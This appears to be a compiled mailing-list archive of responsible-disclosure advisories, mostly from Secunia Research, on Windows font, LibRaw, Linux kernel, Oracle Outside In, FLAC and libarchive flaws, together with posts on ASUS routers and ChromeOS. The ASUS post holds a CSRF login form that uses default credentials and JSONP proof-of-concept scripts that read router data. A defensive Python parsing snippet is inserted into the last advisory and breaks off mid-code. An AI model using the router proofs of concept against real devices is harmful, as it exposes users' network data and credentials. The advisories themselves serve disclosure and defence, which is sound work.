
==
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-04/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Microsoft Windows Embedded OpenType Font Engine Font Glyphs Handling Information Disclosure Vulnerability

2018-03-22 Thread Secunia Research
==

Secunia Research 2018/03/14

 Microsoft Windows Embedded OpenType Font Engine Font Glyphs Handling
  Information Disclosure Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Microsoft Windows 7

* Microsoft Windows Server 2008

* Microsoft Windows Server 2012

==
2) Severity

Rating: Moderately critical
Impact: Information Disclosure
Where:  Remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to disclose certain
information.

The vulnerability is caused due to an error within the t2embed.dll
module when handling font glyphs and can be exploited to cause an
out-of-bounds read memory access.

==
4) Solution

Apply update.

==
5) Time Table

2017/12/06 - Vendor notified about vulnerability.
2017/12/07 - Vendor status update.
2017/12/15 - Vendor status update.
2018/02/13 - Vendor patch release.
2018/02/14 - Secunia Advisory SA7 and SA77077 release.
2018/03/14 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Hossein Lotfi, Secunia Research at Flexera.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has
assigned the CVE-2018-0760 identifier for the vulnerability.

==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

http://secunia.com/secunia_research/

http://secunia.com/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-06/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2018-03-16 Thread Secunia Research
==
 
Secunia Research 2018/03/14

   LibRaw Multiple Denial of Service Vulnerabilities
 
==
Table of Contents
 
1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification
 
==
1) Affected Software
 
* LibRaw versions prior to 0.18.8.
 
==
2) Severity
 
Rating: Moderately critical
Impact: Denial of Service
Where:  From remote
 
==
3) Description of Vulnerabilities
 
Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to cause a DoS (Denial of
Service).
 
3.1) A type confusion error within the "identify()" function
(internal/dcraw_common.cpp) can be exploited to trigger a division by
zero.
 
3.2) A boundary error within the "quicktake_100_load_raw()" function
(internal/dcraw_common.cpp) can be exploited to cause a stack-based
buffer overflow and subsequently cause a crash.
 
3.3) An error within the "leaf_hdr_load_raw()" function
(internal/dcraw_common.cpp) can be exploited to trigger a NULL pointer
dereference.
 
The vulnerabilities are confirmed in version 0.18.7 and reported in
versions prior to 0.18.8.
 
==
4) Solution
 
Update to version 0.18.8.
 
==
5) Time Table
 
2018/02/23 - Maintainer contacted with the vulnerability details.
2018/02/25 - Maintainer confirmed the vulnerabilities.
2018/02/25 - Maintainer released a fix.
2018/03/08 - Release of Secunia Advisory SA81000.
2018/03/14 - Public disclosure of Secunia Research Advisory.
 
==
6) Credits
 
Laurent Delosieres, Secunia Research at Flexera Software.
 
==
7) References
 
The Flexera Software CNA has assigned the CVE-2018-5804,
CVE-2018-5805, and CVE-2018-5806 identifiers for the vulnerabilities
through the Common Vulnerabilities and Exposures (CVE) project.
 
==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

https://secuniaresearch.flexerasoftware.com/community/research/

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory 

Secunia Research: Linux Kernel "_sctp_make_chunk()" Denial of Service Vulnerability

2018-02-28 Thread Secunia Research
==

 Secunia Research 2018/02/28

   Linux Kernel "_sctp_make_chunk()" Denial of Service Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* Linux Kernel version 4.15.0.
  Other versions may also be affected.

==
2) Severity

Rating: Not critical
Impact: Denial of Service
Where:  Local System

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in the Linux Kernel,
which can be exploited by malicious, local users to cause a DoS (Denial
of Service).

An error in the "_sctp_make_chunk()" function (net/sctp/sm_make_chunk.c)
when handling the SCTP packet length can be exploited to cause a kernel
crash.

The vulnerability is confirmed in versions 4.15.0-r7 and 4.15.0.
Other versions may also be affected.

==
4) Solution

Fixed in the source code repository.
https://git.kernel.org/linus/07f2c7ab6f8d0a7e7c5764c4e6cc9c52951b9d9c

==
5) Time Table

2018/02/07 - Linux Kernel team contacted with vulnerability details.
2018/02/07 - Linux Kernel team advised reporting the vulnerability
 publicly via netdev mailing list.
2018/02/07 - Public disclosure of the vulnerability on netdev mailing
 list.
2018/02/09 - The vulnerability additionally reported on linux-sctp
 mailing list.
2018/02/28 - Release of Secunia Advisory SA81331.
2018/02/28 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Jakub Jirasek, Secunia Research at Flexera.

Additionally reported by Alexey Kodanev.

==
7) References

The Flexera CNA has assigned the CVE-2018-5803 identifier for the
vulnerability through the Common Vulnerabilities and Exposures (CVE)
project.

==
8) About Flexera

http://www.flexera.com

https://www.flexera.com/enterprise/products/

https://www.flexera.com/enterprise/company/about/secunia-research/

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory by visiting the Secunia Research website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2018-2

==


Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2018-01-29 Thread Secunia Research
==

Secunia Research 2018/01/29

  LibRaw Multiple Denial of Service Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* LibRaw versions prior to 0.18.7.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to cause a DoS (Denial of
Service).

1) An off-by-one error within the "LibRaw::kodak_ycbcr_load_raw()"
function (internal/dcraw_common.cpp) can be exploited to cause a
heap-based buffer overflow and subsequently cause a crash.

2) An error within the "LibRaw::unpack()" function (src/libraw_cxx.cpp)
can be exploited to trigger a NULL pointer dereference.

3) An error within the "kodak_radc_load_raw()" function
(internal/dcraw_common.cpp) related to the "buf" variable can be
exploited to cause an out-of-bounds read memory access and
subsequently cause a crash.

Successful exploitation of this vulnerability requires the library to
be compiled with the "-O0" compilation flag.

The vulnerabilities are confirmed in version 0.18.6 and reported in
versions prior to 0.18.7.

==
4) Solution

Update to version 0.18.7.

==
5) Time Table

2018/01/16 - Maintainer contacted with the vulnerability details.
2018/01/19 - Maintainer confirmed the vulnerabilities.
2018/01/19 - Maintainer released a fix.
2018/01/25 - Release of Secunia Advisory SA79000.
2018/01/29 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera Software.

==
7) References

The Flexera Software CNA has assigned the CVE-2018-5800,
CVE-2018-5801, and CVE-2018-5802 identifiers for the vulnerabilities
through the Common Vulnerabilities and Exposures (CVE) project.

==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

https://secuniaresearch.flexerasoftware.com/community/research/

Secunia Research: LibRaw Multiple Denial of Service Vulnerabilities

2017-12-11 Thread Secunia Research
==

Secunia Research 2017/12/08

 LibRaw Multiple Denial of Service Vulnerabilities

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerabilities
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* LibRaw versions prior to 0.18.6.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in LibRaw,
which can be exploited by malicious people to cause a DoS (Denial of
Service). 

1) An error related to the "LibRaw::panasonic_load_raw()" function
(dcraw_common.cpp) can be exploited to cause a heap-based buffer
overflow and subsequently cause a crash via a specially crafted TIFF
image.

2) An error within the "LibRaw::xtrans_interpolate()" function
(internal/dcraw_common.cpp) can be exploited to cause an invalid read
memory access.

The vulnerabilities are confirmed in version 0.18.5 and reported in
versions prior to 0.18.6.

==
4) Solution

Update to version 0.18.6.

==
5) Time Table

2017/12/04 - Maintainer contacted with the vulnerability details.
2017/12/04 - Maintainer confirmed the vulnerability.
2017/12/06 - Maintainer released a fix.
2017/12/07 - Release of Secunia Advisory SA76000.
2017/12/08 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Laurent Delosieres, Secunia Research at Flexera Software.

==
7) References

The Flexera Software CNA has assigned the CVE-2017-16909 and
CVE-2017-16910 identifiers for the vulnerabilities through the Common
Vulnerabilities and Exposures (CVE) project.

==
8) About Flexera Software

http://www.flexerasoftware.com/enterprise/company/about/

http://www.flexerasoftware.com/enterprise/products/

https://secuniaresearch.flexerasoftware.com/community/research/

https://secuniaresearch.flexerasoftware.com/community/advisories/

==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-19

==


Secunia Research: Oracle Outside In Denial of Service Vulnerability

2017-11-21 Thread Secunia Research
==

 Secunia Research 2017/10/21

  Oracle Outside In Denial of Service Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera
9) Verification

==
1) Affected Software

* Oracle Outside In version 8.5.3.0.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to cause a DoS
(Denial of Service).

The vulnerability is caused due to an error within the vstif6.dll,
which can be exploited to cause an out-of-bounds write memory access.

The vulnerability is confirmed in version 8.5.3.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2296870.1

==
5) Time Table

2017/03/14 - Vendor notified about vulnerability.
2017/03/17 - Vendor supplied bug ticket ID.
2017/05/10 - Vendor asks for extension of publishing deadline.
2017/05/11 - Replied to vendor with new publishing timeline.
2017/05/15 - Vendor supplies information of fix in main codeline.
2017/10/17 - Release of vendor patch.
2017/10/18 - Release of Secunia Advisory SA76869.
2017/11/21 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-10051 identifier for the vulnerability.

==
8) About Flexera


==
9) Verification

Please verify this advisory by visiting the website:
https://secuniaresearch.flexerasoftware.com/secunia_research/2017-18/

==


Secunia Research: Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

2017-05-23 Thread Secunia Research
==

 Secunia Research 2016/05/22

Microsoft Windows Heap-based Buffer Overflow Vulnerabilities

==
Table of Contents

Affected Software..............................1
Severity.......................................2
Description of Vulnerabilities.................3
Solution.......................................4
Time Table.....................................5
Credits........................................6
References.....................................7
About Flexera Software.........................8
Verification...................................9

==
1) Affected Software

* Microsoft Windows 10
* Microsoft Windows 7
* Microsoft Windows 8.1
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008
* Microsoft Windows Server 2012
* Microsoft Windows Server 2016
* Microsoft Windows Vista

==
2) Severity

Rating: Highly critical
Impact: System access
Where:  From remote

==
3) Description of Vulnerabilities

Secunia Research has discovered multiple vulnerabilities in Microsoft
Windows, which can be exploited by malicious people to compromise a
vulnerable system.

1) An error within the "LoadUvsTable()" function can be exploited to
cause a heap-based buffer overflow via a font file containing
specially crafted Unicode Variation Sequences tables.

2) An integer overflow error within the "LoadFont()" function can be
exploited to cause a heap-based buffer overflow via a font file
containing specially crafted Unicode Variation Sequences tables. 

Successful exploitation of the vulnerabilities allows execution of
arbitrary code.

The vulnerabilities are confirmed on a fully patched Windows 10
Professional (gdi32full.dll version 10.0.14393.576) and Windows 7
Professional (usp10.dll version 1.626.7601.23585). Other versions
may also be affected.

==
4) Solution

Apply update.
https://technet.microsoft.com/library/security/MS17-013

==
5) Time Table

2016/12/13 - Notified vendor about an incomplete fix of CVE-2016-7274.
2016/12/14 - Release of Secunia Advisory SA74000 due to details
 implicitly being public.
2016/12/15 - Update of SA74000 with a further vulnerability.
2016/12/29 - Vendor communication regarding root cause analysis.
2017/01/25 - Vendor patch scheduled for February 2017.
2017/02/14 - Vendor announces delay of February 2017 patch releases.
2017/03/06 - Vendor patch scheduled for March 2017.
2017/03/14 - Updated Secunia Advisory SA74000 due to release
 of vendor patch.
2017/05/22 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Discovered by Hossein Lotfi, Secunia Research at Flexera Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-0014 identifier for the vulnerabilities.

==
8) About Flexera Software


Secunia Research: FLAC "read_metadata_vorbiscomment_()" Memory Leak Denial of Service Vulnerability

2017-05-15 Thread Secunia Research
==

Secunia Research 2017/05/11

FLAC "read_metadata_vorbiscomment_()" Memory Leak
 Denial of Service Vulnerability

==
Table of Contents

Affected Software..............................1
Severity.......................................2
Description of Vulnerability...................3
Solution.......................................4
Time Table.....................................5
Credits........................................6
References.....................................7
About Flexera Software.........................8
Verification...................................9

==
1) Affected Software

* FLAC version 1.3.2. Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FLAC, which can be
exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error in the
"read_metadata_vorbiscomment_()" function (stream_decoder.c), which
can be exploited to cause a memory leak via a specially crafted FLAC
file.

The vulnerability is confirmed in version 1.3.2. Other versions may
also be affected.

==
4) Solution

Fixed in the source code repository.

==
5) Time Table

2017/04/06 - Initial contact to request security contact.
2017/04/06 - Maintainer responds with security contact.
2017/04/06 - Maintainer contacted with the vulnerability details.
2017/04/08 - Maintainer provides a patch in the official source
 code repository.
2017/04/21 - Release of Secunia Advisory SA76102.
2017/05/11 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Discovered by Jakub Jirasek, Secunia Research at Flexera Software.

==
7) References

The Flexera Software CNA has assigned the CVE-2017-6888 identifier
for the vulnerability through the Common Vulnerabilities and Exposures
(CVE) project.

==
8) About Flexera Software


==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2017-7/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Multiple Vulnerabilities in ASUS Routers [CVE-2017-5891 and CVE-2017-5892]

2017-05-10 Thread Nightwatch Cybersecurity Research
[Original post here:
https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]

Summary

Various models of ASUS RT routers have several CSRF vulnerabilities
allowing malicious sites to login and change settings in the router;
multiple JSONP vulnerabilities allowing exfiltration of router data
and an XML endpoint revealing WiFi passwords. Most of these issues
have been fixed by Asus in the March 2017 firmware update under
v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains
unfixed since the vendor doesn't consider it to be a security threat.
CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892
to cover the non-CSRF issues.

Vulnerability Details

RT routers from ASUS like many other routers come with a built-in web
interface accessible over the local network but normally not
accessible via the Internet. We discovered multiple issues within that
web interface that can facilitate attacks on the router either via a
malicious site visited by a user on the same network, or a malicious
mobile or desktop application running on the same network. For the
CSRF vulnerabilities, a user would need to visit a malicious site which
can try to login and change settings. For the JSONP vulnerabilities, a
website can load the JSONP endpoints via SCRIPT tags as long as a
matching function name is defined on that site. The
XML endpoint requires a mobile or desktop application to exploit.
NOTE: all of these assume that the attacker knows the local IP address
of the router. This could probably be guessed or be determined via
Javascript APIs like WebRTC. For desktop and mobile applications,
determination of the gateway address should be trivial to implement.

Issue #1 - Login Page CSRF

The login page for the router doesn't have any kind of CSRF
protection, thus allowing a malicious website to submit a login
request to the router without the user's knowledge. Obviously, this
only works if the site either knows the username and password of the
router OR the user hasn't changed the default credentials ("admin /
admin"). To exploit, submit the base-64 encoded username and password
as a "login_authorization" form post to the "/login.cgi" URL of the
router.

Example of a form that can exploit this issue (uses default credentials):

<form action="http://192.168.1.1/login.cgi" method="post" target="_blank">
  ...
</form>



Issue #2 - Save Settings CSRF

The various pages within the interface that can save settings do not
have CSRF protection. That means that a malicious site, once logged in
as described above would be able to change any settings in the router
without the user's knowledge.

NOTE: We have not been able to exploit this issue consistently.

Issue #3 - JSONP Information Disclosure Without Login

Two JSONP endpoints exist within the router which allow detection of
which ASUS router is running and some information disclosure. No login
is required to the router. The vendor doesn't consider these endpoints
a security threat.

The endpoints are as follows:

/findasus.json

Returns the router model name, SSID name and the local IP address of the router

iAmAlive([{modelName: "XXX", ssid: "YYY", ipAddr: ""}])

/httpd_check.json

Returns: {"alive": 1, "isdomain": 0}

Exploit code as follows:

function iAmAlive(payload) {
  window.alert("Result returned: " + JSON.stringify(payload));
}
function alert1() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/findasus.json'
  document.getElementsByTagName('head')[0].appendChild(script);
}
function alert2() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/httpd_check.json'
  document.getElementsByTagName('head')[0].appendChild(script);
}

Issue #4 - JSONP Information Disclosure, Login Required

There exist multiple JSONP endpoints within the router interface that
reveal various data from the router including.

Below is a list of endpoints and exploit code:

/status.asp - Network Information

function getstatus() {
  var script = document.createElement('script');
  script.src = 'http://192.168.1.1/status.asp';
  document.getElementsByTagName('head')[0].appendChild(script);
}
function show_wanlink_info() {
  var obj = {};
  obj.status = wanlink_status();
  obj.statusstr = wanlink_statusstr();
  obj.wanlink_type = wanlink_type();
  obj.wanlink_ipaddr = wanlink_ipaddr();
  obj.wanlink_xdns = wanlink_xdns();
  window.alert(JSON.stringify(obj));
}

<button onclick="getstatus()">Load Status script</button>
<button onclick="show_wanlink_info()">Show wanlink info</button>


/wds_aplist_2g.asp - Surrounding access points, 2.4 GHz band

/wds_aplist_5g.asp - Surrounding access points, 5 GHz band


function getwds_2g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_2g.asp'
document.getElementsByTagName('head')[0].appendChild(script);
}
function getwds_5g() {
var script = document.createElement('script');
script.src = 'http://192.168.1.1/wds_aplist_5g.asp'

ChromeOS / ChromeBooks Persist Certain Network Settings in Guest Mode

2017-04-10 Thread Nightwatch Cybersecurity Research
[Original post can be found here:
https://wwws.nightwatchcybersecurity.com/2017/04/09/advisory-chromeos-chromebooks-persist-certain-network-settings-in-guest-mode/]

SUMMARY

Certain network settings in ChromeOS / ChromeBooks persist between
reboots when set in guest mode. These issues have been reported to the
vendor but will not be fixed since the vendor considers them to be WAI
(Working As Intended). These attacks require physical access to the
device in order to execute them but future avenues of research looking
at network vectors should be undertaken.

BACKGROUND

ChromeOS is the operating system developed by Google that runs on
ChromeBook devices. It is built on top of Linux and around the Chrome
browser. The OS has a guest mode which runs Chrome in anonymous mode
on top of a temporary guest account. The data within that account is
stored in RAM and is erased upon reboot. However, it appears from our
research that some settings, especially network related ones, reside
elsewhere and do persist between reboots.

Our original interest in this area was prompted by a standing $100,000
USD bounty offered by Google to an exploit “that can compromise a
Chromebook or Chromebox with device persistence in guest mode (i.e.
guest to guest persistence with interim reboot, delivered via a web
page)”. While we have not been able to deliver these attacks via a web
page, we did achieve some persistence in network settings in guest
mode via physical access. Further research is needed to achieve remote
exploitation.

DETAILS

The following network settings were observed in guest mode as
persisting between reboots if the change is made by a guest user while
the Chromebook is in guest mode:

- Details of WiFi network such as password, authentication, etc.
- Preferred WiFi network
- DNS settings on the currently connected WiFi network

To replicate, do the following:

1. Login as a guest into the Chromebook.
2. Click on settings, and:

- Try to remove a WiFi network and add a new preferred network;
- Or change settings for an existing network;
- Or change DNS servers for an existing network

3. Reboot, re-enter guest mode and observe settings persisting

The following settings only persist when changes are made on the login
screen. If a user logs in as a guest user or a Google account, this
goes away:

PROXY SETTINGS

To replicate:

1. Start the Chromebook until Login prompt appears. DO NOT login.
2. Click on settings, change the proxy settings in the current network.
3. Reboot and go back to the login screen, confirm settings for proxy
do persist.
4. Login to an existing account or as guest, check settings again and
observe that proxy settings are now greyed out.

Implications of this are most important in scenarios where a shared
Chromebook is used in a public environment such as a library, school,
etc. Using these attacks, a malicious user can modify the settings on
a public ChromeBook to point to malicious DNS (like DNS Changer virus)
or malicious WiFi hotspot, and subsequent users will not realize that
their sessions are affected.

We have not been able to achieve remote exploitation, but an existing
private Chrome API (chrome.networkingPrivate) would provide access to
these settings even in guest mode. This API is not normally available
via the Web, so an additional browser exploit would need to be chained
to the issues described here to achieve a complete exploit. Another
thing to note is that while guest mode normally runs under a RAM disk
which is erased after the device is rebooted, the network settings
appear to reside elsewhere within the device. That can be used as a
further area of possible attacks.

All testing was done in 2016 on the following system, and it is not
clear if other ChromeBook hardware is affected:

Device: Acer C7 Chromebook
Chrome Versions: 49.0.2623.95, 49.0.2623.111 and 51.0.2704.106 (stable)
ChromeOS Versions: 7834.60.0, 7834.66.0 and 8172.62.0 (stable parrot)

VENDOR RESPONSE

The vendor has rejected all of these issues as WAI – working as
intended. The vendor has provided the following explanation:

First of all, note that there are quite a few ways for network
settings to propagate into sessions. DNS and proxy (per issue 627299)
settings are just two of them. You can go further and just join the
device to a malicious WiFi network that it’ll pick up again after
rebooting (this is possible from the login screen, no need to start a
guest session). Edit: There are more issues filed for these cases, cf.
issue 600194 and issue 595563.

If we were to crack down on propagation of (malicious) network
settings into sessions, we’d take quite a UX hit, as we’d have to
prompt the user to reconfirm their network settings whenever the
device is connected to a network that user hasn’t yet approved (and
it’s quite unlikely for this to be effective). The alternative of only
allowing the device owner to configure networks doesn’t fly either as
it has the potential to lock out legitimate users

Secunia Research: libarchive "lha_read_file_header_1()" Out-Of-Bounds Memory Access Denial of Service Vulnerability

2017-01-30 Thread Secunia Research
==

Secunia Research 2017/01/27

  libarchive "lha_read_file_header_1()" Out-Of-Bounds Memory Access 
  Denial of Service Vulnerability

==
Table of Contents

Affected Software..............................1
Severity.......................................2
Description of Vulnerability...................3
Solution.......................................4
Time Table.....................................5
Credits........................................6
References.....................................7
About Flexera Software.........................8
Verification...................................9

==
1) Affected Software

* libarchive version 3.2.2.
  Other versions may also be affected.

==
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in libarchive, which
can be exploited by malicious people to cause a DoS (Denial of
Service).

The vulnerability is caused due to an error in the
"lha_read_file_header_1()" function
(archive_read_support_format_lha.c), which can be exploited to trigger
an out-of-bounds read memory access via a specially crafted archive.

The vulnerability is confirmed in version 3.2.2. Other versions may
also be affected.

==
4) Solution

Fixed in the source code repository.
https://github.com/libarchive/libarchive/commit/98dcbbf0bf4854bf987557e55e55fff7abbf3ea9

==
5) Time Table

2016/12/20 - Initial contact to request security contact.
2016/12/27 - Maintainer responds with security contacts.
2016/12/29 - Maintainers provided with the vulnerability details.
2017/01/11 - Request for status after no response.
2017/01/16 - Maintainers acknowledge the vulnerability and publish a
 suggested fix in an unofficial source code repository.
2017/01/19 - Maintainers informed about the fixed release date of
 Secunia Advisory set to 2017/01/23 due to the public
 disclosure of the vulnerability.
2017/01/19 - Maintainers provide a patch in the official source
 code repository.
2017/01/23 - Release of Secunia Advisory SA74169.
2017/01/27 - Public disclosure of Secunia Research Advisory.
2017/01/30 - Added CVE identifier.

==
6) Credits

Discovered by Jakub Jirasek, Secunia Research at Flexera Software.

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-5601 identifier for the vulnerability.

==
8) About Flexera Software


Secunia Research: Oracle Outside In VSDX Use-After-Free Vulnerability

2017-01-27 Thread Secunia Research
==

   Secunia Research 2016/01/18

Oracle Outside In VSDX Use-After-Free Vulnerability

==
Table of Contents

Affected Software..............................1
Severity.......................................2
Description of Vulnerability...................3
Solution.......................................4
Time Table.....................................5
Credits........................................6
References.....................................7
About Flexera Software.........................8
Verification...................................9

==
1) Affected Software

* Oracle Outside In versions 8.4.0, 8.5.1, 8.5.2, and 8.5.3.

==
2) Severity

Rating: Highly critical
Impact: System Access
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Oracle Outside In,
which can be exploited by malicious people to compromise a vulnerable
system.

The vulnerability is caused due to a use-after-free error within the
vsvsdx.dll when processing PageHeight and PageWidth values of a VSDX
file, which can be exploited to corrupt memory via a specially crafted
VSDX file.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is confirmed in version 8.5.3.

==
4) Solution

Apply update.
https://support.oracle.com/rs?type=doc&id=2203916.1

==
5) Time Table

2016/08/30 - Vendor notified about vulnerability.
2016/08/31 - Vendor supplied bug ticket ID.
2016/10/25 - Vendor supplies information of fix in main codeline.
2017/01/16 - Requested CVE information from the vendor.
2017/01/17 - Release of vendor patch.
2017/01/18 - Vendor responds with CVE identifiers.
2017/01/18 - Release of Secunia Advisory SA73777.
2017/01/18 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera Software

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2017-3266 identifier for the vulnerability.

==
8) About Flexera Software


==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2017-1/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


Secunia Research: Microsoft Windows Type 1 Font Processing Vulnerability

2016-12-14 Thread Secunia Research
==

Secunia Research 2016/12/14

Microsoft Windows Type 1 Font Processing Vulnerability

==
Table of Contents

Affected Software..............................1
Severity.......................................2
Description of Vulnerability...................3
Solution.......................................4
Time Table.....................................5
Credits........................................6
References.....................................7
About Flexera Software.........................8
Verification...................................9

==
1) Affected Software

* Microsoft Windows 10
* Microsoft Windows 7
* Microsoft Windows 8.1
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008
* Microsoft Windows Server 2012
* Microsoft Windows Server 2016
* Microsoft Windows Vista

==
2) Severity

Rating: Moderately critical
Impact: Privilege escalation, Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious, local users to gain escalated 
privileges and by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error within the win32k.sys
when processing Type 1 fonts, which can be exploited to trigger a 
NULL pointer dereference and subsequently cause a kernel crash or 
gain elevated privileges via a specially crafted PFB font.

The vulnerability is confirmed on a fully patched Windows 7 
Professional (win32k.sys version 6.1.7601.23545).

==
4) Solution

Apply update.
https://technet.microsoft.com/library/security/MS16-151

==
5) Time Table

2016/12/01 - Vendor notified about vulnerability.
2016/12/06 - Vendor response.
2016/12/13 - Release of Secunia Advisory SA73777.
2016/12/14 - Public disclosure of Secunia Research Advisory.

==
6) Credits

Behzad Najjarpour Jabbari, Secunia Research at Flexera Software

==
7) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2016-7259 identifier for the vulnerability.

==
8) About Flexera Software


==
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2016-19/

Complete list of vulnerability reports published by Secunia Research:
http

Secunia Research: Microsoft Windows OTF Parsing Table Encoding Record Offset Vulnerability

2016-11-10 Thread Secunia Research
==

Secunia Research 2016/11/10

   Microsoft Windows OTF Parsing Table Encoding Record Offset
  Vulnerability

==
Table of Contents

1) Affected Software
2) Severity
3) Description of Vulnerability
4) Solution
5) Time Table
6) Credits
7) References
8) About Flexera Software
9) Verification

==
1) Affected Software

* Microsoft Windows 10
* Microsoft Windows 7
* Microsoft Windows 8.1
* Microsoft Windows RT 8.1
* Microsoft Windows Server 2008
* Microsoft Windows Server 2012
* Microsoft Windows Server 2016
* Microsoft Windows Vista

==
2) Severity

Rating: Moderately critical
Impact: Exposure of sensitive information or Denial of Service
Where:  From remote

==
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to disclose potentially
sensitive information or cause a DoS (Denial of Service).

The vulnerability is caused by an integer overflow when processing the
CMAP table of OpenType Font (OTF) files and can be exploited to cause a
kernel crash or disclose kernel memory via a specially crafted table
encoding record offset within an OTF file.
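The advisory gives no code, so the following is an added example (not
Microsoft's font parser) of the class of check it describes: a Python parser
for the OpenType 'cmap' header that validates each encoding record's subtable
offset before dereferencing it. The table layout follows the public OpenType
specification; the add-then-compare idiom shown as the flawed form is an
assumed shape of such a bug, not the actual kernel code, and both sample
tables are constructed here.

```python
import struct

# OpenType 'cmap' header: uint16 version, uint16 numTables, then numTables
# encoding records of (uint16 platformID, uint16 encodingID,
# uint32 subtableOffset), offsets relative to the start of the cmap table.
CMAP_HEADER = struct.Struct(">HH")
ENCODING_RECORD = struct.Struct(">HHI")
SUBTABLE_HEADER_LEN = 4        # uint16 format, uint16 length (formats 0/2/4/6)
UINT32_MAX = 0xFFFFFFFF


class MalformedCmap(ValueError):
    pass


def parse_encoding_records(cmap):
    """Return (platformID, encodingID, offset) triples, checking only that
    the record array itself fits inside the table."""
    if len(cmap) < CMAP_HEADER.size:
        raise MalformedCmap("truncated cmap header")
    _version, num_tables = CMAP_HEADER.unpack_from(cmap, 0)
    end = CMAP_HEADER.size + num_tables * ENCODING_RECORD.size
    if end > len(cmap):
        raise MalformedCmap("encoding record array runs past table end")
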